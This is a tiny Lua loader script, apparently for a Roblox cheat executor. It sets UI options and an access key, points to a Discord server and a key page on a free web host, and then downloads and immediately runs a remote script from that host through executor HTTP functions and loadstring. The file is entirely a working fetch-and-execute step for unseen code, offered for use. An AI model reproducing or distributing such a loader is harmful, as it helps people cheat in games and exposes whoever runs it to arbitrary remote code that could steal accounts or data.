getgenv().Settings = { theme = 'Light', --// 'Light','Dark','Mocha','Aqua','Jester' SizeX = 500, SizeY = 350, bgc = Color3.fromRGB(0,0,0), style = 1, --// 1,3 key = 'moonispro123lol' -- ok } --[[ --// join discord server for latest updates gg/bcT9w8r u can get the key at https://followthedamntraincj.000webhostapp.com/getkey.php ok bye --]] local http = http_request or request or (syn and syn.request) or (http and http.request) loadstring(http({Url='https://followthedamntraincj.000webhostapp.com/script.lua', Method='GET'}).Body)()